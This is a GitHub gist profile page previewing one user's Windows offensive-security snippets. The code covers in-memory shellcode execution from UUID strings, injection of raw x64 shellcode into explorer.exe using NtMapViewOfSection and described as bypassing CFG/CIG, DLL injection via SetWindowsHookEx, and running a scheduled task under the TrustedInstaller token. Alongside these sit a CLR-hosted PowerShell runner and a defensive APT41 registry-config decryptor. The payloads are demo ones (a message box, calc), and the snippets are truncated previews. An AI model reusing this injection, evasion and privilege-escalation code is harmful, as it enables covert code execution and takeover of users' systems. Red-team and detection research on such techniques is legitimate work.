Skip to content

Instantly share code, notes, and snippets.

View farzinenddo's full-sized avatar

farzinenddo

6 followers · 0 following
View GitHub Profile
@farzinenddo
farzinenddo / uuid.c
Created March 22, 2021 23:29
Execute ShellCode in memory by abusing windows API
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
const char* uuids[] =
{
"6850c031-6163-636c-5459-504092741551",
"2f728b64-768b-8b0c-760c-ad8b308b7e18",
@farzinenddo
farzinenddo / Find.Net.ps1
Created November 9, 2020 01:06
Finding .Net Binary
function Get-PEMetaData {
[CmdletBinding()]
param($Path)
try {
$FullPath = Resolve-Path -Path $Path -ErrorAction Stop
try {
$Null = [Reflection.AssemblyName]::GetAssemblyName($FullPath)
$Signature = Get-AuthenticodeSignature -FilePath $FullPath -ErrorAction SilentlyContinue
@farzinenddo
farzinenddo / ScheduledTask.ps1
Created May 6, 2020 21:54
Using COM Object for running task under "NT SERVICE\TrustedInstaller" Token
$task = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c calc"
Register-ScheduledTask -TaskName "TestMe" -Action $task
$com.Connect()
$user = "NT SERVICE\TrustedInstaller"
$folder = $com.GetFolder('\')
$t = $folder.GetTask('TestMe')
$t.RunEx($null,0,0,$user)
@farzinenddo
farzinenddo / ExtraByte_ProcessInjection.cpp
Last active April 15, 2020 22:49
Injecting ShellCode to explorer.exe with ExtraByte and NtMapViewOfSection technique and not affected by CFG/CIG
#include "stdafx.h"
#include <Windows.h>
// messagebox(x64) shellcode
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
@farzinenddo
farzinenddo / dll.cpp
Last active April 1, 2020 19:54
Injecting DLL by Smashing the REF and SetWindowsHookEx
#include <Windows.h>
#include <string>
void job() {
TCHAR szExeFileName[MAX_PATH];
GetModuleFileName(NULL, szExeFileName, MAX_PATH);
std::wstring exeName = szExeFileName;
int pos = exeName.find_last_of(L"\\");
exeName = exeName.substr(pos + 1, exeName.length());
std::wstring message = L"Injected in " + exeName + L" (PID " + std::to_wstring(GetCurrentProcessId()) + L")";
@farzinenddo
farzinenddo / Powerless.cpp
Created March 23, 2020 18:44
Running Powershell with CLR in native runtime.
#include <metahost.h>
#pragma comment(lib, "mscoree.lib")
int main(int argc, wchar_t* argv[])
{
HRESULT hr;
ICLRMetaHost *pMetaHost = NULL;
ICLRRuntimeInfo *pRuntimeInfo = NULL;
ICLRRuntimeHost *pClrRuntimeHost = NULL;
@farzinenddo
farzinenddo / apt41-registry-decryptor.ps1
Created March 12, 2020 00:40
Search registry for config created by APT41 or APT27 and decrypt their contents
$CPU = (Get-ItemProperty HKLM:\HARDWARE\DESCRIPTION\System\CentralProcessor\0\).Identifier
$value = ls "Registry::HKEY_CLASSES_ROOT\$CPU*"
$key = [System.Text.Encoding]::UTF8.GetBytes([System.Text.Encoding]::UTF8.GetString($CPU.Substring(0,8)))
$iv = $key
$provider = New-Object System.Security.Cryptography.DESCryptoServiceProvider
$provider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$provider.Padding = [System.Security.Cryptography.PaddingMode]::None
$decryptor = $provider.CreateDecryptor($key, $iv)